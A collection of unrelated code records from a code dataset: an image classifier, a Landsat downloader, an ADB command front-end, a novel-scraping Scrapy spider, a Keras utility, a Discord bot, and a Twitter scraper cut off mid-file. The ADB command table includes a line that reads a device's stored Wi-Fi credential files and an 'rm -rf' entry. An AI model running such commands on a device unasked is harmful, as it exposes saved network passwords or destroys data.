Finally the values are first rescaled to \"\n f\"``[0.0, 1.0]`` and then normalized using ``mean={self.mean}`` and ``std={self.std}``.\"\n )\n\n\nclass ImageClassifier(nn.Module):\n def __init__(self, base_model_name: str, categories, *, transform_configs=None):\n super().__init__()\n transform_configs = transform_configs or dict()\n self.eval_transform = ImageTransform(**transform_configs)\n\n self.categories = categories\n assert len(self.categories) > 1\n\n try:\n model_cls, model_weights = BASE_MODELS[base_model_name]\n except:\n logger.warning(\n f'model {base_model_name} is not supported yet. Use default model `mobilenet_v2` instead'\n )\n model_cls, model_weights = BASE_MODELS['mobilenet_v2']\n\n if model_weights is not None:\n self.base = model_cls(weights=model_weights)\n else:\n self.base = model_cls(pretrained=True)\n\n if 'densenet' in base_model_name:\n last_channel = self.base.classifier.in_features\n dropout = 0.0\n else:\n dropout = self.base.classifier[0].p\n last_channel = self.base.classifier[1].in_features\n self.base.classifier = nn.Sequential(\n nn.Dropout(p=dropout), nn.Linear(last_channel, len(self.categories)),\n )\n\n self.criterion = nn.CrossEntropyLoss()\n\n # weight initialization\n for m in self.modules():\n if isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, 0, 0.01)\n nn.init.zeros_(m.bias)\n\n def load(self, model_fp, device='cpu'):\n self.device = torch.device(device)\n self.to(self.device)\n load_model_params(self, model_fp, device=device)\n\n def forward(self, x: torch.Tensor):\n logits = self.base(x)\n prediction = logits.softmax(dim=1)\n pred_probs, preds = prediction.topk(1, dim=1)\n outs = dict(\n logits=logits, preds=preds.squeeze(-1), probs=pred_probs.squeeze(-1)\n )\n return outs\n\n def calculate_loss(self, batch, **kwargs):\n imgs, labels = batch\n outs = self(imgs)\n loss = self.criterion(outs['logits'], labels)\n\n outs.update(dict(target=labels, loss=loss))\n return outs\n\n @torch.no_grad()\n def predict_images(\n self,\n images: List[Union[str, torch.Tensor]],\n *,\n batch_size: int = 32,\n **loader_kwargs,\n ) -> List[Tuple[str, float]]:\n \"\"\"\n 预测给定图片列表的类别。\n\n Args:\n images (List[Union[str, torch.Tensor]]): if is a torch.Tensor, the tensor should be\n with values ranging from 0 to 255, and with shape [height, width, 3].\n batch_size (int): batch size. 
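Editor's aside on the image-classifier record above: its ImageTransform reproduces the standard eval-time pipeline (resize, center-crop, rescale to [0, 1], normalize). An equivalent-in-spirit sketch using stock torchvision transforms, assuming a plain model that maps a batch to logits (the record's classifier returns a dict instead):

import torch
from torchvision import transforms

eval_tf = transforms.Compose([
    transforms.Resize(232),
    transforms.CenterCrop(224),
    transforms.ToTensor(),                       # uint8 HWC -> float CHW in [0, 1]
    transforms.Normalize(mean=[0.485, 0.456, 0.406],
                         std=[0.229, 0.224, 0.225]),
])

@torch.no_grad()
def predict(model, pil_image, categories):
    model.eval()
    probs = model(eval_tf(pil_image).unsqueeze(0)).softmax(dim=1)
    p, idx = probs.max(dim=1)
    return categories[idx.item()], p.item()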
Default: 32.\n **loader_kwargs ():\n\n Returns: [(<类别名称>, <对应概率>), (<类别名称>, <对应概率>), (<类别名称>, <对应概率>), ...]\n\n \"\"\"\n self.eval()\n\n def collate_fn(_images):\n img_list = [\n self.eval_transform(_img) for _img in _images if _img is not None\n ]\n imgs = torch.stack(img_list)\n goods = torch.tensor(\n [idx for idx, _img in enumerate(_images) if _img is not None],\n dtype=torch.int32,\n )\n return imgs, goods, torch.tensor(len(_images))\n\n class ListDataset(Dataset):\n def __init__(self, _images):\n self._images = _images\n\n def __getitem__(self, idx):\n img = self._images[idx]\n if isinstance(img, str):\n try:\n img = torch.tensor(\n read_img(img, gray=False).transpose((2, 0, 1))\n )\n except:\n img = None\n elif isinstance(img, torch.Tensor):\n img = img.permute((2, 0, 1))\n return img\n\n def __len__(self):\n return len(self._images)\n\n dataset = ListDataset(images)\n dataloader = DataLoader(\n dataset,\n batch_size=batch_size,\n shuffle=False,\n collate_fn=collate_fn,\n **loader_kwargs,\n )\n\n results = []\n for batch in tqdm.tqdm(dataloader):\n _images = batch[0].to(self.device)\n outs = self(_images)\n goods = batch[1].cpu().numpy().tolist()\n batch_len = int(batch[2].cpu())\n part_res = [(self.categories[0], 1.0 / len(self.categories))] * batch_len\n for idx, pred, prob in zip(\n goods,\n outs['preds'].cpu().numpy().tolist(),\n outs['probs'].cpu().numpy().tolist(),\n ):\n part_res[idx] = (self.categories[pred], prob)\n results.extend(part_res)\n return results\n\n\nif __name__ == '__main__':\n img = torch.tensor(\n read_img(\"dev-samples/dev-0.png\", gray=False).transpose((2, 0, 1))\n )\n\n transform_configs = {\n 'crop_size': [150, 450],\n 'resize_size': 160,\n 'resize_max_size': 1000,\n }\n clf = ImageClassifier(\n base_model_name='mobilenet_v2',\n categories=('bad', 'good'),\n transform_configs=transform_configs,\n )\n clf.eval()\n preprocess = clf.eval_transform\n batch = preprocess(img).unsqueeze(0)\n\n outs = clf(batch)\n\n class_id = outs['preds'][0].item()\n score = outs['probs'][0].item()\n category_name = clf.categories[class_id]\n print(f\"{category_name}: {100 * score:.1f}%\")\n","repo_name":"Samawia2910/CNOCR-AI-","sub_path":"cnocr/classification/image_classifier.py","file_name":"image_classifier.py","file_ext":"py","file_size_in_byte":8932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1564683132","text":"__author__ = 'Jwely'\n\nimport os\nimport cookielib\nimport urllib, urllib2\nimport time\nimport tarfile\n\n\ndef fetch_test_landsat(test_dir):\n \"\"\"\n downloading data from earth explorer requires that users are logged in.\n This function opens a session and stores the required cookies to\n make automated download from earthexplorer.usgs possible.\n\n https://earthexplorer.usgs.gov/login/\n \"\"\"\n\n # list of tiles that will be downloaded by this function\n tiles = [\"http://earthexplorer.usgs.gov/download/3119/LT40410361990014XXX01/STANDARD\",\n \"http://earthexplorer.usgs.gov/download/3119/LT50410362011208PAC01/STANDARD\",\n \"http://earthexplorer.usgs.gov/download/3372/LE70410362003114EDC00/STANDARD\",\n \"http://earthexplorer.usgs.gov/download/4923/LC80410362014232LGN00/STANDARD\"]\n\n\n print(\"This script downloads landsat data from earth explorer by USGS\")\n print(\"This server requires authentication to retrieve data\")\n print(\"This script immediately discards this info after download is complete\\n\")\n username = raw_input(\"please type in your USGS username:\")\n password = 
raw_input(\"please type in your USGS password:\")\n\n subdir = os.path.join(test_dir, \"raw\",\"Landsat\")\n if not os.path.exists(subdir):\n os.makedirs(subdir)\n\n # build a cookie jar.\n cookies = cookielib.CookieJar()\n\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies))\n\n # build payload\n url = \"https://earthexplorer.usgs.gov/login/\"\n payload = {'username': username,\n 'password': password,\n 'rememberMe': \"1\"}\n\n logdata = urllib.urlencode(payload)\n\n # send the request and receive the response\n opener.open(url, logdata)\n resp = opener.open(\"https://earthexplorer.usgs.gov/login/\")\n text = resp.read()\n\n\n if username in text:\n print(\"Logged into USGS Earth Explorer!\")\n print(\"Beginning downloads, please be patient!\")\n else:\n print(\"Could not Log in!\")\n\n\n # now lets download the data\n for tile in tiles:\n resp = opener.open(tile)\n attachments = resp.headers[\"Content-Disposition\"].split('=')\n filename = attachments[1].replace('\"',\"\").replace(\"'\",\"\")\n\n print(\"Downloading {0}\".format(filename))\n outname = os.path.join(subdir, filename)\n\n try:\n urllib.urlretrieve(resp.url, outname)\n\n except urllib2.HTTPError:\n time.sleep(10) # helps server overload errors\n print(\"Working...\")\n urllib.urlretrieve(resp.url, outname)\n\n # extract the archives and delete tar.gz files.\n print(\"Extracting tifs from tar.gz\")\n time.sleep(3)\n tfile = tarfile.open(outname, 'r:gz')\n outdir = os.path.join(subdir, outname.replace(\".tar.gz\",\"\"))\n tfile.extractall(outdir)\n tfile.close()\n os.remove(outname)\n\n return","repo_name":"NASA-DEVELOP/dnppy","sub_path":"dev/test/fetch_test_landsat.py","file_name":"fetch_test_landsat.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"61"} +{"seq_id":"20260414466","text":"# TCArg 2020 - Contest #9\n# Removing Columns\n# https://codeforces.com/group/j1UosVRZar/contest/288666/problem/A\n\nif __name__ == \"__main__\":\n\tn, m = [int(x) for x in input().split()]\n\ttable = []\n\tfor _ in range(n):\n\t\ttable.append(list(input()))\n\ti = 1\n\toperations = 0\n\twhile i < n:\n\t\tif table[i - 1] > table[i]:\n\t\t\tfor j in range(m):\n\t\t\t\tif table[i - 1][j] > table[i][j]:\n\t\t\t\t\tbreak\n\t\t\tfor i in range(n):\n\t\t\t\tdel table[i][j]\n\t\t\toperations += 1\n\t\t\ti = 1\n\t\telse:\n\t\t\ti += 1\n\tprint(operations)\n","repo_name":"eloyhz/competitive-programming","sub_path":"tc-arg/contest-09/a_removing_columns.py","file_name":"a_removing_columns.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8216929329","text":"import EmployeeClass as ec\nimport PayrollDeductionClass as pd\n\nJimmy_Smith = ec.Employee('Jimmy Smith','58475','Information Systems','Developer',6800)\n\ndeduction_1 = pd.Payroll('food court','8/14/2022',22.50,'39119')\ndeduction_2 = pd.Payroll('gift contribution','8/12/2022',25.00,'58475')\ndeduction_3 = pd.Payroll('food court','8/17/2022',15.25,'21547')\ndeduction_4 = pd.Payroll('vending machine','8/22/2022',3.00,'58475')\ndeduction_5 = pd.Payroll('vending machine','8/5/2022',2.75,'58475')\n\n\n\nlist1 = [deduction_1,deduction_2,deduction_3,deduction_4,deduction_5]\n\ntotal_deduction = 0\n\nfor i in list1:\n if i.get_EmployeeID() == '58475':\n total_deduction += i.get_ChargeAmount()\n\nnet_pay = Jimmy_Smith.get_MonthlySalary() - total_deduction\nname = Jimmy_Smith.get_name()\nId_number = 
Jimmy_Smith.get_IDnumber()\ndepartment = Jimmy_Smith.get_department()\ngross_pay = Jimmy_Smith.get_MonthlySalary()\n\n\n\n\n\nprint('*** Employee Pay ***')\nprint('Name: ',name)\nprint('ID Number: ',Id_number)\nprint('Department: ',department)\nprint('Gross Pay: $',gross_pay)\nprint('Net Pay: $',net_pay)\n\n\n\n\n","repo_name":"WillStutz/Chapter_10_HW","sub_path":"NetPay.py","file_name":"NetPay.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42853089695","text":"# coding=utf-8\n\nimport subprocess\nimport time\nimport os\nimport sys\n\nimport pygame\nfrom pygame.locals import *\n\nfrom adb_warnings import *\nfrom adb_UI import *\n\n# Commands\nADB_COMMANDS = {\n 0: ['adb start-server',\n 'adb devices'],\n 1: ['adb kill-server'],\n 2: ['adb shell screencap -p /sdcard/screen.png',\n 'adb pull /sdcard/screen.png d:/',\n 'adb shell rm /sdcard/screen.png'],\n 3: ['adb root',\n 'adb remount',\n 'adb shell ls system/app',\n 'adb shell rm -rf $1',\n 'adb reboot'],\n 4: ['adb root',\n 'adb push $1 $2',\n 'adb reboot'],\n 5: ['adb shell input keyevent $1'],\n 6: ['adb get-serialno'],\n 7: ['adb devices'],\n 8: ['adb reboot'],\n 9: ['adb reboot bootloader'],\n 10: ['adb reboot recovery'],\n 11: ['adb logcat -t $1'],\n 12: ['adb shell cat /sys/class/net/wlan0/address'],\n 13: ['adb help'],\n 14: ['adb shell cat /proc/cpuinfo'],\n 15: ['adb install $1'],\n 16: ['adb install -r $1'],\n 17: ['adb install -s $1'],\n 18: ['adb uninstall $1'],\n 19: ['adb uninstall -k $1'],\n 20: ['adb shell am start -n $1'],\n 21: ['adb shell top'],\n 22: ['adb shell top -m 6'],\n 23: ['adb shell top -n 1'],\n 24: ['adb shell procrank'],\n 25: ['adb shell kill $1'],\n 26: ['adb shell ps'],\n 27: ['adb shell ps -x $1'],\n 28: ['adb shell service list'],\n 29: ['adb shell cat /proc/meminfo'],\n 30: ['adb shell cat /proc/iomem'],\n 31: ['adb remount'],\n 32: ['adb pull $1 $2'],\n 33: ['adb push $1 $2'],\n 34: ['adb shell ls $1'],\n 35: ['adb shell cd $1'],\n 36: ['adb shell rename $1 $2'],\n 37: ['adb shell rm /system/avi.apk'],\n 38: ['adb shell rm -rf $1'],\n 39: ['adb shell chmod 777 $1'],\n 40: ['adb shell mv $1 $2'],\n 41: ['adb shell mkdir $1'],\n 42: ['adb shell cat $1'],\n 43: ['adb shell cat /data/misc/wifi/*.conf'],\n 44: ['adb logcat -c'],\n 45: ['adb bugreport $1'],\n 46: ['adb shell cat /system/build.prop'],\n 47: ['adb devices',\n 'adb root',\n 'adb remount']\n}\n\n# Max time to wait\nTIME_OUT = 16\n# Min time to wait\nMIN_TIME_EXC = 2\n\n# Commands execution\ndef execute_command(wins, cmd):\n # If cmd = adb shell, then open the COMMAND for WINDOWS\n if cmd in ['adb shell']:\n subprocess.Popen('cmd', shell=True)\n return 0, 'Auto-open COMMAND for further adb shell testing.\\n'\n\n # Execute commands in a subprocess\n sp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\n # Exceed the MIN_TIME_EXC and consider that this command requires more time for IO or it has an instant IO\n # time.sleep(MIN_TIME_EXC)\n\n # Initialize the keyboard event listening\n pygame.init()\n pygame.display.set_mode((1, 1))\n # Relocate the standard output and error information\n while sp.poll() is None and cmd not in ['adb help']: # None: executing. 
Specific process for 'adb help'\n stdout_info = str(sp.stdout.readline()).strip() + '\\n'\n wins.change_text_display(stdout_info)\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n sp.terminate()\n wins.change_text_display('CTRL-C Interrupt Happening...', interrupt=True)\n pygame.quit()\n return 0, '\\n'\n pygame.display.update()\n\n # Cease listening\n pygame.quit()\n stdout_info, stderr_info = sp.communicate()\n res = str(stdout_info) + str(stderr_info) + '\\n'\n return sp.returncode, res\n","repo_name":"SinestroEdmonce/AdbTestSimpleUI","sub_path":"adb_commnd.py","file_name":"adb_commnd.py","file_ext":"py","file_size_in_byte":3574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40210113581","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom books.mysql import msyqlHelper\nfrom urllib.parse import urljoin\nimport logging\nimport re\n\n\nclass FenghuangSpider(scrapy.Spider):\n\tname = 'booke'\n\tallowed_domains = ['biqugex.com','baoliny.com','630book.la','9cwx.com','kanshula.org','xxbiquge.com','wangshuge.com','lewenxiaoshuo.com','22ff.com','23us.cc','wenxuemm.com','yqzww.com']\n\tstart_urls = [\n\t\t\t\t\t['无敌医神','http://www.biqugex.com/book_21372/','//div[@class=\"listmain\"]/dl/dd[position()>12]/a','content'],\n\t\t\t\t\t['超品兵王','http://www.baoliny.com/119720/index.html','/html/body/div[2]/div[4]/table/tr/td/a','content'],\n\t\t\t\t\t['美女保镖','http://www.630book.la/shu/13556.html','//dl[@class=\"zjlist\"]/dd/a','content'],\n\t\t\t\t\t['修仙归来在都市','http://www.9cwx.com/6_6130/','//*[@id=\"list\"]/dl/dd[position()>9]/a','content'],\n\t\t\t\t\t['混迹花都','http://www.kanshula.org/3_3489/0.html','//*[@id=\"list\"]/dl/dd/a','content'],\n\t\t\t\t\t['农民医生','http://www.xxbiquge.com/22_22895/','//*[@id=\"list\"]/dl/dd[position()>17]/a','content'],\n\t\t\t\t\t['纨绔兵王','http://www.wangshuge.com/books/97/97200/','//*[@id=\"at\"]/tr/td/a','contents'],\n\t\t\t\t\t['家有表姐太傲娇','http://www.lewenxiaoshuo.com/books/jiayoubiaojietaiaojiao/','//*[@id=\"list\"]/dl/dd/a','content'],\n\t\t\t\t\t['美女大小姐的贴身兵王','http://www.22ff.com/xs/205845/','//div[@class=\"neirong\"]/div/a','chapter_content'],\n\t\t\t\t\t['情路官道','http://www.23us.cc/html/88/88465/','//div[@id=\"main\"]/div/dl[@class=\"chapterlist\"]/dd/a','content'],\n\t\t\t\t\t['最强废少','http://www.wenxuemm.com/book/46/46492/','//div[@class=\"novel_list\"]/ul/li/a','clickeye_content'],\n\t\t\t\t\t['妙手狂医','http://www.yqzww.com/files/article/html/2/2566/index.html','//div[@class=\"zjlist4\"]/ol/li/a','htmlContent']\n\t\t\t\t]\n\t\n\tdef start_requests(self):\n\t\tmsyql = msyqlHelper()\n\t\tfor url in self.start_urls:\n\t\t\tbook_name = url[0]\n\t\t\tlink = url[1]\n\t\t\tbid = msyql.insertbook(book_name)\n\t\t\tmeta = {}\n\t\t\tmeta['bid'] = bid\n\t\t\tmeta['xpath'] = url[2]\n\t\t\tif len(url) == 5:\n\t\t\t\tmeta['other'] = True\n\t\t\telse:\n\t\t\t\tmeta['other'] = False\n\t\t\tmeta['id'] = url[3]\n\t\t\tyield scrapy.Request(link,callback=self.parse,meta=meta)\n\t\tmsyql.close();\n\tdef parse(self,response):\n\t\tmysql = msyqlHelper()\n\t\told = response.meta\n\t\tnames = set(['上架感言!'])\n\t\tlinks = response.xpath(old['xpath'])\n\t\t\n\t\tj = 1\n\t\tfor link in links:\n\t\t\tname = link.xpath('text()').extract_first();\n\t\t\tif name in names:\n\t\t\t\tcontinue;\n\t\t\thref = link.xpath('@href').extract_first();\n\t\t\turl = urljoin(response.url,href)\n\t\t\tnames.add(name)\n\t\t\tmeta = {}\n\t\t\tmeta['name'] = name\n\t\t\tmeta['bid'] = 
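Editor's aside on the ADB-command record above: its core loop streams a subprocess's stdout line by line while the process runs. The same idea without the pygame interrupt handling, as a minimal sketch (function name mine):

import subprocess

def stream_command(cmd: list) -> int:
    """Run a command and relay its stdout line by line, as the ADB UI does."""
    with subprocess.Popen(cmd, stdout=subprocess.PIPE,
                          stderr=subprocess.STDOUT, text=True) as proc:
        for line in proc.stdout:                 # blocks until the next line
            print(line.rstrip())
    return proc.returncode                       # set once the context exits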
old['bid']\n\t\t\tmeta['size'] = 0\n\t\t\tmeta['is_vip'] = 1\n\t\t\tmeta['prev_cid'] = 0\n\t\t\tmeta['next_cid'] = 0\n\t\t\tmeta['sequence'] = j\n\t\t\tj = j+1\n\t\t\tself.logger.info('Parse url is %s', url)\n\t\t\tchapter_id = mysql.insert(meta);\n\t\t\tmeta['chapter_id'] = chapter_id\n\t\t\tif old['other'] == True:\n\t\t\t\tmeta['id'] = old['id']+href.replace('.html','')\n\t\t\telse:\n\t\t\t\tmeta['id'] = old['id']\n\t\t\tself.logger.info('chapter_id is ------------------%s',chapter_id)\n\t\t\tyield scrapy.Request(url,callback=self.parse2,meta=meta)\n\t\tmysql.close();\n\t\n\tdef parse2(self,response):\n\t\told = response.meta\n\t\tself.logger.info('parse2 parse2 parse2 parse2 parse2------------------')\n\t\tself.logger.info(response.status)\n\t\tself.logger.info('parse2 function called on dfsdfsd------------------%s',response.url)\n\t\tstr = response.xpath('//*[@id=\"'+old['id']+'\"]/text()').extract()\n\t\tif not str:\n\t\t\tstr = response.xpath('//*[@id=\"'+old['id']+'\"]/p/text()').extract()\n\t\tdata = \tresponse.meta\n\t\tdata['content'] = \"\\r\\n\".join(str)\n\t\tyield data\n\t\t","repo_name":"toosin/book_craw","sub_path":"books/spiders/booke.py","file_name":"booke.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69799914436","text":"\"\"\"\n Course Schedule\n\n There are a total of numCourses courses you have to take, labeled from 0 to numCourses-1.\n\n Some courses may have prerequisites, for example to take course 0 you have to first take course 1, which is expressed as a pair: [0,1]\n\n Given the total number of courses and a list of prerequisite pairs, is it possible for you to finish all courses?\n\n Example 1:\n Input: numCourses = 2, prerequisites = [[1,0]]\n Output: true\n Explanation: There are a total of 2 courses to take. \n To take course 1 you should have finished course 0. So it is possible.\n\n Example 2:\n Input: numCourses = 2, prerequisites = [[1,0],[0,1]]\n Output: false\n Explanation: There are a total of 2 courses to take. \n To take course 1 you should have finished course 0, and to take course 0 you should\n also have finished course 1. So it is impossible.\n \n\n Constraints:\n * The input prerequisites is a graph represented by a list of edges, not adjacency matrices. 
Read more about how a graph is represented.\n * You may assume that there are no duplicate edges in the input prerequisites.\n * 1 <= numCourses <= 10^5\n\"\"\"\n\nclass Solution:\n def canFinish(self, numCourses: int, prerequisites: List[List[int]]) -> bool:\n \n graph = collections.defaultdict(list)\n \n V = numCourses\n \n for u, v in prerequisites:\n graph[v].append(u)\n \n visited = [0] * V\n \n def isCycle(node):\n if visited[node] == 1:\n return True\n if visited[node] == 0:\n \n visited[node] = 1\n \n for neighbour in graph[node]:\n if isCycle(neighbour):\n return True\n \n visited[node] = 2\n \n return False\n \n \n for node in range(V):\n if visited[node] == 0:\n if isCycle(node):\n return False\n \n return True","repo_name":"bugsanderrors/MayLeetCodingChallenge","sub_path":"W5Q1.py","file_name":"W5Q1.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"32468304343","text":"# pylint: disable=R0903\n\nfrom django.conf import settings\nfrom django.utils import timezone\n\nimport pytz\n\n__all__ = ['TimezoneMiddleware']\n\n\nclass TimezoneMiddleware:\n \"\"\"\n Activate user's timezone if user has timezone field.\n\n add this manually to your `MIDDLEWARE` list:\n\n # settings/base.py\n\n MIDDLEWARE += [\n 'vb_baseapp.middlewares.TimezoneMiddleware',\n ]\n\n Note:\n\n This middleware will be more helpfull if you use custom User model\n with `timezone` field. Check `django-timezone-field` package!\n\n \"\"\"\n\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n tzname = settings.TIME_ZONE\n if request.user.id and getattr(request.user, 'timezone', None):\n tzname = request.user.timezone\n timezone.activate(pytz.timezone(tzname))\n\n response = self.get_response(request)\n return response\n","repo_name":"vbyazilim/django-vb-baseapp","sub_path":"vb_baseapp/middlewares/timezone.py","file_name":"timezone.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15889737439","text":"import importlib.util\n\nfrom typing import Any, Iterable, Mapping, NamedTuple, Optional, Sequence, Union\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom .models.data_format import DataFormat\nfrom . 
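Editor's aside on the Course Schedule record above: the solution is three-color DFS cycle detection on the prerequisite graph (state 1 on the recursion stack means a back edge, hence a cycle). A standalone restatement:

from collections import defaultdict

def can_finish(num_courses: int, prerequisites: list) -> bool:
    graph = defaultdict(list)
    for course, prereq in prerequisites:
        graph[prereq].append(course)
    state = [0] * num_courses                    # 0 new, 1 on stack, 2 done

    def has_cycle(node: int) -> bool:
        if state[node] == 1:
            return True                          # back edge -> cycle
        if state[node] == 2:
            return False
        state[node] = 1
        if any(has_cycle(n) for n in graph[node]):
            return True
        state[node] = 2
        return False

    return not any(has_cycle(n) for n in range(num_courses))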
import utilities\n\n\ndef _load_module(file_path, name):\n spec = importlib.util.spec_from_file_location(name=name, location=file_path)\n module = importlib.util.module_from_spec(spec=spec)\n\n spec.loader.exec_module(module)\n\n return module\n\n\ndef _iterate_tensors(tensors: Union[tf.Tensor, Iterable[tf.Tensor]]):\n yield tensors\n\n\ndef _get_data_format(tensor: tf.Tensor):\n layer = getattr(tensor, '_keras_history')[0]\n data_format = None\n\n for node in getattr(layer, '_outbound_nodes'):\n if tensor in _iterate_tensors(node.input_tensors):\n outbound_layer = node.outbound_layer\n\n try:\n keras_data_format = outbound_layer.data_format\n except AttributeError:\n continue\n\n if keras_data_format == 'channels_first':\n if data_format is None:\n data_format = DataFormat.CHANNELS_FIRST\n elif data_format == DataFormat.CHANNELS_LAST:\n return None\n else:\n if data_format is None:\n data_format = DataFormat.CHANNELS_LAST\n elif data_format == DataFormat.CHANNELS_FIRST:\n return None\n\n return data_format\n\n\ndef get_custom_objects(file_path):\n module_name = ''\n custom_objects = {}\n module = _load_module(file_path, module_name)\n\n for name, value in vars(module).items():\n if isinstance(value, type) and issubclass(value, keras.layers.Layer) and value.__module__ == module_name:\n custom_objects[name] = value\n\n return custom_objects\n\n\nclass NodeSpec(NamedTuple):\n layer_name: str\n node_index: int = 0\n\n @staticmethod\n def from_str(value: str) -> 'NodeSpec':\n groups = value.split(':')\n\n if len(groups) == 1:\n node_index = 0\n elif len(groups) == 2:\n node_index = int(groups[1])\n else:\n raise ValueError\n\n return NodeSpec(layer_name=groups[0], node_index=node_index)\n\n\ndef _get_node_specs(values: Optional[Iterable[str]]):\n return utilities.map_optional(values, lambda value: list(map(NodeSpec.from_str, value)))\n\n\ndef get_inputs(model: keras.Model, input_specs: Optional[Sequence[NodeSpec]]):\n if input_specs is None:\n return [(tensor, _get_data_format(tensor)) for tensor in model.inputs]\n\n return [(tensor, _get_data_format(tensor))\n for input_spec in input_specs\n for tensor in _iterate_tensors(model.get_layer(input_spec.layer_name).get_input_at(input_spec.node_index))]\n\n\ndef get_outputs(model: keras.Model, input_specs: Optional[Sequence[NodeSpec]]):\n if input_specs is None:\n return model.outputs\n\n return [\n tensor\n for input_spec in input_specs\n for tensor in _iterate_tensors(model.get_layer(input_spec.layer_name).get_output_at(input_spec.node_index))\n ]\n\n\nclass Config(NamedTuple):\n input_nodes: Optional[Sequence[NodeSpec]] = None\n output_nodes: Optional[Sequence[NodeSpec]] = None\n max_batch_size: Optional[int] = None\n need_search_schedule: Optional[bool] = None\n target: Optional[str] = None\n\n @staticmethod\n def from_json(value: Mapping[str, Any]) -> 'Config':\n return Config(input_nodes=_get_node_specs(value.get('input_layer_names')),\n output_nodes=_get_node_specs(value.get('output_layer_names')),\n max_batch_size=value.get('max_batch_size'),\n target=value.get('target'),\n need_search_schedule=value.get('need_search_schedule'))\n\n @staticmethod\n def from_env(env: Mapping[str, str]) -> 'Config':\n return Config(input_nodes=_get_node_specs(utilities.split_by(env.get('INPUT_LAYER_NAMES'), ',')),\n output_nodes=_get_node_specs(utilities.split_by(env.get('OUTPUT_LAYER_NAMES'), ',')),\n max_batch_size=utilities.map_optional(env.get('MAX_BATCH_SIZE'), int),\n target=env.get('TARGET'),\n need_search_schedule=env.get('NEED_SEARCH_SCHEDULE') in 
['True', 'true', 'TRUE'] if\n                          env.get('NEED_SEARCH_SCHEDULE') else None)\n","repo_name":"Adlik/Adlik","sub_path":"model_compiler/src/model_compiler/keras_util.py","file_name":"keras_util.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":702,"dataset":"github-code","pt":"61"}
+{"seq_id":"31980612656","text":"import discord\nfrom discord.ext import commands\nfrom TimeConversion import DataOut as DataOut\n\n\nclass EmbedBot:\n\n    def __init__(self, bot: commands.Bot):\n        self.bot = bot\n\n    async def bot_embed(self, channel, description, url, icon_url, footer_text):\n        embed = discord.Embed(description=description, color=0x00ffffff)\n        embed.set_thumbnail(url=url)\n        embed.set_footer(text=footer_text, icon_url=icon_url)\n        await channel.send(embed=embed)\n\n    async def embed_top(self, top_game, guild, url, description, footer_text, date=None, bot=None):\n\n        icon_url = 'https://cdn.onlinewebfonts.com/svg/download_378989.png'\n        description = self.description(description, date)\n        description += self.description_time(top_game, bot)\n        category = guild.categories[0]\n        channel = category.channels[0]\n        await self.bot_embed(channel, description, url, icon_url, footer_text)\n\n    async def embed_user(self, top_game, ctx, url, description, footer_text, date=None, bot=None):\n        icon_url = 'https://cdn.onlinewebfonts.com/svg/download_378989.png'\n        description = self.description(description, date)\n        description += self.description_time(top_game, bot)\n        footer_text = self.footer_text(top_game, footer_text)\n        await self.bot_embed(ctx, description, url, icon_url, footer_text)\n\n    def description(self, description, date):\n        if date is not None:\n            description += f' {date} \\n'\n        elif date is None:\n            description += f'\\n'\n        return description\n\n    def description_time(self, top_game, bot):\n        tg = DataOut()\n        description: str = ''\n        for i in top_game:\n            tg.time_update(i[1])\n            if bot:\n                description += f'\\t{bot.get_user(i[0]).display_name} - '\n            elif bot is None:\n                description += f'\\t{i[0]} - '\n            description += f'{tg.output_days(True)}, '\n            description += f'{tg.output_hours(True)}, '\n            description += f'{tg.output_minutes(True)}\\n'\n        return description\n\n    def footer_text(self, top_game, footer_text):\n        tg = DataOut()\n        if footer_text is None:\n            all_tg = 0\n            for i in top_game:\n                all_tg += i[1]\n            tg.time_update(all_tg)\n            footer_text = f'{tg.output_days(True)}, '\n            footer_text += f'{tg.output_hours(True)}, '\n            footer_text += f'{tg.output_minutes(True)}\\n'\n        return footer_text\n","repo_name":"KrestyaninovIvan/DiscordBOT","sub_path":"bot/embedbot.py","file_name":"embedbot.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14006253243","text":"import json\nimport random\nimport time\nimport urllib\nfrom datetime import datetime, timedelta\n\nimport bs4\nimport psycopg2\nimport requests\n\n# URLs to get Twitter search results\nTWITTER_SEARCH_URL = 'https://twitter.com/search?q={0}&src=typd&qf=off&l=en'\nTWITTER_SEARCH_MORE_URL = 'https://twitter.com/i/search/timeline?q={0}&src=typd&vertical=default&include_available_features=1&include_entities=1&qf=off&l=en&max_position={1}'\n\n# URLs to get Twitter user timeline.\nTWITTER_USER_URL = 'https://twitter.com/{0}'\nTWITTER_USER_MORE_URL = 'https://twitter.com/i/profiles/show/{0}/timeline/tweets?include_available_features=1&include_entities=1&max_position={1}'\n\n# Different user-agent values to 
